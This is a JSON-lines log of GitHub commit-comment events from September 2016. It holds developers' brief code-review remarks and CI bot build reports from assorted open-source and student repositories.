{"id":"4534240344","type":"CommitCommentEvent","actor":{"login":"jeznet"},"repo":{"name":"stefan-kolb/rack-stream"},"payload":{"comment":{"id":18945418,"position":null,"line":null,"path":null,"commit_id":"4c3b2a6e64b5e2dc00828fcd662de258ef279f9f","created_at":"2016-09-08T14:08:38Z","updated_at":"2016-09-08T14:08:38Z","body":"You are right, but this does not conflict with sending a pull request."}},"created_at":"2016-09-08T14:08:38Z"}
{"id":"4534241708","type":"CommitCommentEvent","actor":{"login":"Gymnasiast"},"repo":{"name":"IntelOrca/OpenRCT2"},"payload":{"comment":{"id":18945422,"position":128,"line":337,"path":"src/rct1.h","commit_id":"193309025696cd7476768673f400b48f33ac3d33","created_at":"2016-09-08T14:08:51Z","updated_at":"2016-09-08T14:08:51Z","body":"You mean creating a pull request for changing it?"}},"created_at":"2016-09-08T14:08:51Z"}
{"id":"4534243550","type":"CommitCommentEvent","actor":{"login":"aafemt"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18945426,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:09:11Z","updated_at":"2016-09-08T14:09:11Z","body":"> May be some built-in function (no idea about name right now)\r\n\r\nRDB$GET_CONTEXT()?.."}},"created_at":"2016-09-08T14:09:11Z"}
{"id":"4534249793","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18945444,"position":9,"line":713,"path":"js/about/preferences.js","commit_id":"09d03e50d2fea21b02a0f392becd8c1eddfbd5d2","created_at":"2016-09-08T14:10:10Z","updated_at":"2016-09-08T14:10:10Z","body":"Mentioned in chat but this will show loading for valid values of 0"}},"created_at":"2016-09-08T14:10:10Z"}
{"id":"4534250115","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18945447,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T14:10:14Z","updated_at":"2016-09-08T14:10:14Z","body":"From the 3.4 Release Notes (for all users):\r\n\r\n\"The .NET 2.0 version of the framework now includes LINQ. If your tests target .NET 2.0, you can now use LINQ queries in your tests.\"\r\n\r\nThis was not for our tests, it was for all tests.  Thought the same about Action and Func."}},"created_at":"2016-09-08T14:10:14Z"}
{"id":"4534251216","type":"CommitCommentEvent","actor":{"login":"dsommers"},"repo":{"name":"Zimbra-Community/zimbra-tools"},"payload":{"comment":{"id":18945452,"position":null,"line":null,"path":null,"commit_id":"ead1cd7a30feb337d5846b85ef02bf2266e56a25","created_at":"2016-09-08T14:10:24Z","updated_at":"2016-09-08T14:10:24Z","body":"While this looks correct at first glance and is a step in the right direction, I think it would be good to look into providing a separate unit file for each of the Zimbra components independently.  This would give a far better overview when doing `systemct status` (that is without any unit name).\r\n\r\nPlus it is possible write/use D-Bus enabled monitoring tools which could capture and alert more instantly if one of the Zimbra components stops running.  For example, I have experienced that clamav have stopped running by itself a few times, which then impacts mail delivery."}},"created_at":"2016-09-08T14:10:24Z"}
{"id":"4534252970","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945456,"position":57,"line":57,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T14:10:39Z","updated_at":"2016-09-08T14:10:39Z","body":"Потому что у нас 1 вагон, вызываем `delete_wagon` 1 меньше 0 = `false` отнимаем вагон. Теперь у нас 0 вагонов, вызываем `delete_wagon` `0 < 0` == `false` отнимаем вагон. Теперь у нас -1 вагон :)"}},"created_at":"2016-09-08T14:10:39Z"}
{"id":"4534253102","type":"CommitCommentEvent","actor":{"login":"waveform80"},"repo":{"name":"RPi-Distro/python-gpiozero"},"payload":{"comment":{"id":18945457,"position":65,"line":576,"path":"gpiozero/pins/data.py","commit_id":"6cc308e44a987db1cc3e038b07627add91e1c5ad","created_at":"2016-09-08T14:10:40Z","updated_at":"2016-09-08T14:10:40Z","body":"They do? The ones with the CSI ports? Huh, could've sworn I tried that but you're absolutely right - just tried it on mine and it is indeed 1.3 ... okay, that needs correcting when I get a sec!"}},"created_at":"2016-09-08T14:10:40Z"}
{"id":"4534255449","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":18945459,"position":null,"line":null,"path":null,"commit_id":"2528ecd71b9563e333f636f1bbb04c4ddba278eb","created_at":"2016-09-08T14:11:00Z","updated_at":"2016-09-08T14:11:00Z","body":"The fix was already updated"}},"created_at":"2016-09-08T14:11:00Z"}
{"id":"4534259961","type":"CommitCommentEvent","actor":{"login":"bgcngm"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18945473,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T14:11:44Z","updated_at":"2016-09-08T14:11:44Z","body":"I get your point, and hey... this is open up for everyone's discussion. I will put that back, but now give me a break. I have more interesting things to look at... such as the kernel sources."}},"created_at":"2016-09-08T14:11:44Z"}
{"id":"4534261678","type":"CommitCommentEvent","actor":{"login":"kbalog"},"repo":{"name":"kbalog/uis-dat630-fall2016"},"payload":{"comment":{"id":18945479,"position":null,"line":null,"path":null,"commit_id":"c79bbf00b7636d4dbfaa0b1805519b23af8c7c17","created_at":"2016-09-08T14:12:00Z","updated_at":"2016-09-08T14:12:00Z","body":"It won't run until you complete the missing parts."}},"created_at":"2016-09-08T14:12:00Z"}
{"id":"4534262733","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945484,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T14:12:11Z","updated_at":"2016-09-08T14:12:11Z","body":"Ок. Как поезд понимает на какой станции сейчас находится?"}},"created_at":"2016-09-08T14:12:11Z"}
{"id":"4534263145","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18945485,"position":9,"line":713,"path":"js/about/preferences.js","commit_id":"40b5072b6d8a229bb8262d7af7f7e6a8e3fd737a","created_at":"2016-09-08T14:12:16Z","updated_at":"2016-09-08T14:12:16Z","body":"sorry just working through my reviews in sequence, thanks for fixing here."}},"created_at":"2016-09-08T14:12:16Z"}
{"id":"4534266605","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945491,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T14:12:47Z","updated_at":"2016-09-08T14:12:47Z","body":"Нам ещё нужно показывать предыдущую, текущую и следующую станции."}},"created_at":"2016-09-08T14:12:47Z"}
{"id":"4534267091","type":"CommitCommentEvent","actor":{"login":"madmax51"},"repo":{"name":"madmax51/pram"},"payload":{"comment":{"id":18945492,"position":null,"line":null,"path":null,"commit_id":"57577472864d3247b0c1238818ddc0bc717d391d","created_at":"2016-09-08T14:12:52Z","updated_at":"2016-09-08T14:12:52Z","body":"Hhhhhhh"}},"created_at":"2016-09-08T14:12:52Z"}
{"id":"4534269090","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18945497,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T14:13:10Z","updated_at":"2016-09-08T14:13:10Z","body":"Dude can I test it out it will be awesome to test it in my birthday :)"}},"created_at":"2016-09-08T14:13:10Z"}
{"id":"4534273749","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18945504,"position":null,"line":null,"path":null,"commit_id":"eb85597347a393c6c4da07423d9828717b1b66e4","created_at":"2016-09-08T14:13:53Z","updated_at":"2016-09-08T14:13:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#G2uRji_lRNiw2ZJ0XcRbCw"}},"created_at":"2016-09-08T14:13:53Z"}
{"id":"4534275212","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945507,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:14:07Z","updated_at":"2016-09-08T14:14:07Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T14:14:07Z"}
{"id":"4534280444","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18945513,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T14:14:54Z","updated_at":"2016-09-08T14:14:54Z","body":"If you do not mind this issue #78."}},"created_at":"2016-09-08T14:14:54Z"}
{"id":"4534284648","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":18945523,"position":191,"line":646,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/Exchange.java","commit_id":"cfb5fe45313ddfdcdb1e5dbc42d37762e800f557","created_at":"2016-09-08T14:15:32Z","updated_at":"2016-09-08T14:15:32Z","body":"For messageID, I agree with you.\r\nAnd the DTLS spec seems to go on our side as same epoch implies same connection (same IP/Port in DTLS language)"}},"created_at":"2016-09-08T14:15:32Z"}
{"id":"4534288984","type":"CommitCommentEvent","actor":{"login":"technoken"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18945531,"position":null,"line":null,"path":null,"commit_id":"d62f422e3d951a50bb0b71d0dc69143eace970f9","created_at":"2016-09-08T14:16:14Z","updated_at":"2016-09-08T14:16:14Z","body":"@Atemo should all `OnTouch` be replaced by `OnTouch_`? What their difference? Just want to know bc I have custom npc's using OnTouch. Thanks!"}},"created_at":"2016-09-08T14:16:14Z"}
{"id":"4534290097","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18945535,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T14:16:23Z","updated_at":"2016-09-08T14:16:23Z","body":"> Ок. Как поезд понимает на какой станции сейчас находится?\r\n\r\nА это неважно. Мы же указываем на какую станцию нам нужно переместиться, а эту станцию мы указываем в кач-ве аргумента.\r\n\r\n> Нам ещё нужно показывать предыдущую, текущую и следующую станции.\r\n\r\nДа, сорри, этот метод допилю.\r\n"}},"created_at":"2016-09-08T14:16:23Z"}
{"id":"4534293676","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945541,"position":null,"line":null,"path":null,"commit_id":"83e6781ed825725db2ca072555e73e93a5771f7c","created_at":"2016-09-08T14:16:55Z","updated_at":"2016-09-08T14:16:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 968](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12954&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 3 (3 new), passed: 211, ignored: 3 Build time: 00:08:37\n### Failed tests\n```\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET to download file returns the file contents: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET to download a file returns 3xx if the package URL is an s3 URI: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.downloading an update with a blacklisted package returns bad request: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-08T14:16:55Z"}
{"id":"4534296295","type":"CommitCommentEvent","actor":{"login":"raju234007"},"repo":{"name":"raju234007/Hello"},"payload":{"comment":{"id":18945547,"position":2,"line":2,"path":"README.md","commit_id":"e4b17a6a050b2b673c42027f5ad34e26846e1e1d","created_at":"2016-09-08T14:17:20Z","updated_at":"2016-09-08T14:17:20Z","body":"Bravo! Now, you’re on the code view for your readme-edits branch, which is a copy of master. Let’s make some edits.\r\n\r\nOn GitHub, saved changes are called commits. Each commit has an associated commit message, which is a description explaining why a particular change was made. Commit messages capture the history of your changes, so other contributors can understand what you’ve done and why."}},"created_at":"2016-09-08T14:17:20Z"}
{"id":"4534297699","type":"CommitCommentEvent","actor":{"login":"bajtos"},"repo":{"name":"strongloop/loopback"},"payload":{"comment":{"id":18945550,"position":null,"line":null,"path":null,"commit_id":"98816217c951bdc0a357e427f987ae491e5e3384","created_at":"2016-09-08T14:17:33Z","updated_at":"2016-09-08T14:17:33Z","body":"The `localRegistry` flag/feature is not complete yet. Things may break if you switch to a local registry, see e.g. recent https://github.com/strongloop/loopback/pull/2628.\r\n\r\nIf you don't mind spending a little bit time at the beginning to troubleshoot possible `localRegistry` issues that your app may discover, then it's a goo idea to go ahead and use `localRegistry` in your project too."}},"created_at":"2016-09-08T14:17:33Z"}
{"id":"4534297761","type":"CommitCommentEvent","actor":{"login":"nimishamukherjee"},"repo":{"name":"nimishamukherjee/almighty-ui"},"payload":{"comment":{"id":18945551,"position":6,"line":18,"path":"src/app/work-item/work-item.service.ts","commit_id":"edd4b85d543092cf6b5741f368047a7518dc2a2e","created_at":"2016-09-08T14:17:33Z","updated_at":"2016-09-08T14:17:33Z","body":"@aslakknutsen I have updated src/app/auth/authentication.service.ts. \r\nthis.auth.getToken() - getToken resides in authentication.service.ts.\r\nIncase authToken is invalid, the app will take the user to the login page.\r\n"}},"created_at":"2016-09-08T14:17:33Z"}
{"id":"4534298782","type":"CommitCommentEvent","actor":{"login":"KovaxG"},"repo":{"name":"KovaxG/Haskell"},"payload":{"comment":{"id":18945553,"position":63,"line":63,"path":"XO/main.hs","commit_id":"a9c2fc921a2b9022233d0a64030f115898857e61","created_at":"2016-09-08T14:17:42Z","updated_at":"2016-09-08T14:17:42Z","body":"Why does this function exist? Basically what happens is:\r\n\r\n`String -> [(Point, String)] -> Maybe Point -> Try Point`\r\n\r\nWhy not have only one function that does:\r\n\r\nString -> Try Point"}},"created_at":"2016-09-08T14:17:42Z"}
{"id":"4534298865","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945554,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:17:42Z","updated_at":"2016-09-08T14:17:42Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T14:17:42Z"}
{"id":"4534299016","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945555,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:17:43Z","updated_at":"2016-09-08T14:17:43Z","body":"Request cannot be processed. Rate limit exceeded; please wait 41522750ms before trying again."}},"created_at":"2016-09-08T14:17:43Z"}
{"id":"4534302129","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945561,"position":null,"line":null,"path":null,"commit_id":"83e6781ed825725db2ca072555e73e93a5771f7c","created_at":"2016-09-08T14:18:12Z","updated_at":"2016-09-08T14:18:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 969](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12958&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T14:18:12Z"}
{"id":"4534302418","type":"CommitCommentEvent","actor":{"login":"Anarchid"},"repo":{"name":"AppSynergy/swl-website"},"payload":{"comment":{"id":18945562,"position":null,"line":null,"path":null,"commit_id":"ed1f4630bd5156753237ac34452adb232e0d28bf","created_at":"2016-09-08T14:18:15Z","updated_at":"2016-09-08T14:18:15Z","body":"This seems to be in the wrong fork!"}},"created_at":"2016-09-08T14:18:15Z"}
{"id":"4534307421","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945569,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:19:00Z","updated_at":"2016-09-08T14:19:00Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T14:19:00Z"}
{"id":"4534307510","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945570,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:19:01Z","updated_at":"2016-09-08T14:19:01Z","body":"Request received; should be processed within 2 minutes."}},"created_at":"2016-09-08T14:19:01Z"}
{"id":"4534308367","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945574,"position":null,"line":null,"path":null,"commit_id":"83e6781ed825725db2ca072555e73e93a5771f7c","created_at":"2016-09-08T14:19:09Z","updated_at":"2016-09-08T14:19:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 969](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12958&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:00:56"}},"created_at":"2016-09-08T14:19:09Z"}
{"id":"4534313423","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18945585,"position":null,"line":null,"path":null,"commit_id":"aa9d0b990e335f945355b5c8251d82a0aab78d48","created_at":"2016-09-08T14:19:55Z","updated_at":"2016-09-08T14:19:55Z","body":"rethrow() shouldn't be disabled in production. In production exceptions also happen and need to be acted upon (there even may be code where you intentionally _want_ to catch them as well as there will be code where you explicitly want to discard them).\r\n\r\nAlso, loop error handlers are the way to go. These need to determine whether to continue or not.\r\n\r\nAnyway, please remove the rethrow()'s again as they're pointless here."}},"created_at":"2016-09-08T14:19:55Z"}
{"id":"4534314851","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945587,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:20:09Z","updated_at":"2016-09-08T14:20:09Z","body":"6 passing, 3 failing"}},"created_at":"2016-09-08T14:20:09Z"}
{"id":"4534315656","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18945589,"position":9,"line":175,"path":"cura/Settings/ContainerManager.py","commit_id":"8a8b55800b905dd479848bf8a4f61a0a6d7ebd1b","created_at":"2016-09-08T14:20:17Z","updated_at":"2016-09-08T14:20:17Z","body":"The result of this method is 'str' not bool.\r\n"}},"created_at":"2016-09-08T14:20:17Z"}
{"id":"4534315720","type":"CommitCommentEvent","actor":{"login":"dividedmind"},"repo":{"name":"conjurinc/backlog-reporter"},"payload":{"comment":{"id":18945590,"position":null,"line":null,"path":null,"commit_id":"ec991ea19b390e9a13ad453e314f0ab3446f9306","created_at":"2016-09-08T14:20:18Z","updated_at":"2016-09-08T14:20:18Z","body":"Good catch and good fix, thanks!"}},"created_at":"2016-09-08T14:20:18Z"}
{"id":"4534316639","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18945595,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:20:25Z","updated_at":"2016-09-08T14:20:25Z","body":"Something like ERROR::SQLCODE / ERROR::NAME / ERROR::MESSAGE? As a simplified version of a somewhat radical \"declare error E; ...; E.SQLCODE\" that was suggested in pull-request. Or, as Alex suggests, as simple as built-in function ERROR_CONTEXT(SQLCODE | ... | NAME | MESSAGE)?"}},"created_at":"2016-09-08T14:20:25Z"}
{"id":"4534319497","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18945597,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-08T14:20:49Z","updated_at":"2016-09-08T14:20:49Z","body":"++"}},"created_at":"2016-09-08T14:20:49Z"}
{"id":"4534322343","type":"CommitCommentEvent","actor":{"login":"kuon"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18945603,"position":54,"line":714,"path":"lib/ecto/query.ex","commit_id":"640e8f5f7f97eab68e4eebcd517803f71d90ebc1","created_at":"2016-09-08T14:21:18Z","updated_at":"2016-09-08T14:21:18Z","body":"Does this support something like:\r\n\r\n```elixir\r\ncities_in_sweden = from(c in City, where: [state: \"Sweden\"])\r\nlarge_cities = from(c in City, where: population > 1000)\r\ncities = from(c in City, where: ^cities_in_sweden, or_where: ^large_cities)\r\n```"}},"created_at":"2016-09-08T14:21:18Z"}
{"id":"4534323195","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18945604,"position":null,"line":null,"path":null,"commit_id":"08e61913ceca21d73d2c854fcca4324ace588b3b","created_at":"2016-09-08T14:21:24Z","updated_at":"2016-09-08T14:21:24Z","body":"btw pls double check when closing issues they are in the current milestone, helps Alex when we triage. Thanks! I got this one."}},"created_at":"2016-09-08T14:21:24Z"}
{"id":"4534324439","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18945606,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T14:21:35Z","updated_at":"2016-09-08T14:21:35Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-08T14:21:35Z"}
{"id":"4534325804","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18945610,"position":13,"line":477,"path":"src/support.cpp","commit_id":"0c6aca19aa659bd8a7491366b20f70a78bb51e3b","created_at":"2016-09-08T14:21:47Z","updated_at":"2016-09-08T14:21:47Z","body":"Derp!\r\ndone."}},"created_at":"2016-09-08T14:21:47Z"}
{"id":"4534327307","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945613,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:22:01Z","updated_at":"2016-09-08T14:22:01Z","body":"@CPSC310Bot #d1"}},"created_at":"2016-09-08T14:22:01Z"}
{"id":"4534327401","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18945614,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T14:22:01Z","updated_at":"2016-09-08T14:22:01Z","body":"Request cannot be processed. Rate limit exceeded; please wait 43087458ms before trying again."}},"created_at":"2016-09-08T14:22:01Z"}
{"id":"4534328003","type":"CommitCommentEvent","actor":{"login":"andygill"},"repo":{"name":"ku-fpg/kansas-lava"},"payload":{"comment":{"id":18945615,"position":null,"line":null,"path":null,"commit_id":"ea63395903e933dc7b94ee2219c2f505cf01834d","created_at":"2016-09-08T14:22:08Z","updated_at":"2016-09-08T14:22:08Z","body":"Fixed. Thanks."}},"created_at":"2016-09-08T14:22:08Z"}
{"id":"4534331911","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18945627,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T14:22:42Z","updated_at":"2016-09-08T14:22:42Z","body":"Or really a dedicated namespace for RDB$GET_CONTEXT, e.g. ('ERROR', 'name')."}},"created_at":"2016-09-08T14:22:42Z"}
{"id":"4534335928","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18945631,"position":null,"line":null,"path":null,"commit_id":"8c4a1fd26f9d111638b72e31adc5c4658f8b0af1","created_at":"2016-09-08T14:23:20Z","updated_at":"2016-09-08T14:23:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 970](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12960&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T14:23:20Z"}
{"id":"4534340039","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18945636,"position":54,"line":714,"path":"lib/ecto/query.ex","commit_id":"640e8f5f7f97eab68e4eebcd517803f71d90ebc1","created_at":"2016-09-08T14:23:56Z","updated_at":"2016-09-08T14:23:56Z","body":"Yes!\n\nOn Thursday, September 8, 2016, Nicolas Goy <notifications@github.com>\nwrote:\n\n> Does this support something like:\n>\n> cities_in_sweden = from(c in City, where: [state: \"Sweden\"])\n> large_cities = from(c in City, where: population > 1000)\n> cities = from(c in City, where: ^cities_in_sweden, or_where: ^large_cities)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/elixir-ecto/ecto/commit/640e8f5f7f97eab68e4eebcd517803f71d90ebc1#commitcomment-18945603>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAlbuqmS7OnhKxWZ7YOP5y9bRLBgmtGks5qoBnegaJpZM4J4DEl>\n> .\n>\n\n\n-- \n\n\n*José Valimwww.plataformatec.com.br\n<http://www.plataformatec.com.br/>Founder and Director of R&D*\n"}},"created_at":"2016-09-08T14:23:56Z"}
{"id":"4534341163","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18945637,"position":34,"line":493,"path":"src/support.cpp","commit_id":"0c6aca19aa659bd8a7491366b20f70a78bb51e3b","created_at":"2016-09-08T14:24:08Z","updated_at":"2016-09-08T14:24:08Z","body":"done"}},"created_at":"2016-09-08T14:24:08Z"}
{"id":"4534344673","type":"CommitCommentEvent","actor":{"login":"kpodemski"},"repo":{"name":"PrestaShop/docs"},"payload":{"comment":{"id":18945642,"position":null,"line":null,"path":null,"commit_id":"30d85d2d421b70f36e52eb6aa1938891bb5bbd5d","created_at":"2016-09-08T14:24:39Z","updated_at":"2016-09-08T14:24:39Z","body":"@julienbourdeau i really like to see `themeoptions` in `.yml` but remember about a way to passing those variables from a module too! :+1: to make them dynamic and configurable"}},"created_at":"2016-09-08T14:24:39Z"}
{"id":"4534348832","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18945647,"position":null,"line":null,"path":null,"commit_id":"27695f27f6f11409e1be7d1e86030b45d2e98bf0","created_at":"2016-09-08T14:25:18Z","updated_at":"2016-09-08T14:25:18Z","body":"why?"}},"created_at":"2016-09-08T14:25:18Z"}
{"id":"4534351403","type":"CommitCommentEvent","actor":{"login":"Marco01809"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18945654,"position":null,"line":null,"path":null,"commit_id":"08f36243e9fe37951eda1990c8f78788e9aca4cf","created_at":"2016-09-08T14:25:41Z","updated_at":"2016-09-08T14:25:41Z","body":"This fixed the issue for me."}},"created_at":"2016-09-08T14:25:41Z"}
{"id":"4534351930","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18945655,"position":11,"line":88,"path":"scripts/album.js","commit_id":"4c967fb8d6461084398b888a7d1763637047851b","created_at":"2016-09-08T14:25:46Z","updated_at":"2016-09-08T14:25:46Z","body":"remember, console.Log shouldn't be in your final code"}},"created_at":"2016-09-08T14:25:46Z"}
{"id":"4534354197","type":"CommitCommentEvent","actor":{"login":"doublemarked"},"repo":{"name":"strongloop/loopback"},"payload":{"comment":{"id":18945661,"position":null,"line":null,"path":null,"commit_id":"98816217c951bdc0a357e427f987ae491e5e3384","created_at":"2016-09-08T14:26:05Z","updated_at":"2016-09-08T14:26:05Z","body":"TYVM @bajtos "}},"created_at":"2016-09-08T14:26:05Z"}
